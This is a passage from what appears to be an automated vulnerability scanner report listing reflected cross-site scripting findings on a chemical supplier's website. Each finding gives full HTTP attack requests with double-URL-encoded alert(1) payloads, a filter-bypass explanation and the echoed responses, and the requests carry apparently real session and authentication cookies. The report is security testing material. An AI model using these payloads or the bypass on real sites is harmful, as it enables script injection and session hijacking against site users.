Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home/enews-subscriptionc8fa8";alert(1)//22e7bdf4d51","E404") ;
   </script>
...[SNIP]...

1.223. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27269%2522%253balert%25281%2529%252f%252f1f12ad1242 was submitted in the REST URL parameter 1. This input was echoed as 27269";alert(1)//1f12ad1242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content27269%2522%253balert%25281%2529%252f%252f1f12ad1242/sigma-aldrich/technical-service/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content27269";alert(1)//1f12ad1242/sigma-aldrich/technical-service/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.224. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b8c2%2522%253balert%25281%2529%252f%252f883d4082bed was submitted in the REST URL parameter 2. This input was echoed as 4b8c2";alert(1)//883d4082bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich4b8c2%2522%253balert%25281%2529%252f%252f883d4082bed/technical-service/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich4b8c2";alert(1)//883d4082bed/technical-service/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.225. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1371d%2522%253balert%25281%2529%252f%252f8f63dedfa0 was submitted in the REST URL parameter 3. This input was echoed as 1371d";alert(1)//8f63dedfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service1371d%2522%253balert%25281%2529%252f%252f8f63dedfa0/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:29 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service1371d";alert(1)//8f63dedfa0/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.226. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cd0%2522%253balert%25281%2529%252f%252f90fb9daca14 was submitted in the REST URL parameter 4. This input was echoed as 12cd0";alert(1)//90fb9daca14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-home12cd0%2522%253balert%25281%2529%252f%252f90fb9daca14/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home12cd0";alert(1)//90fb9daca14/literature-request","E404") ;
   </script>
...[SNIP]...

1.227. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a171f%2522%253balert%25281%2529%252f%252fb6d51f297e was submitted in the REST URL parameter 5. This input was echoed as a171f";alert(1)//b6d51f297e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-home/literature-requesta171f%2522%253balert%25281%2529%252f%252fb6d51f297e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
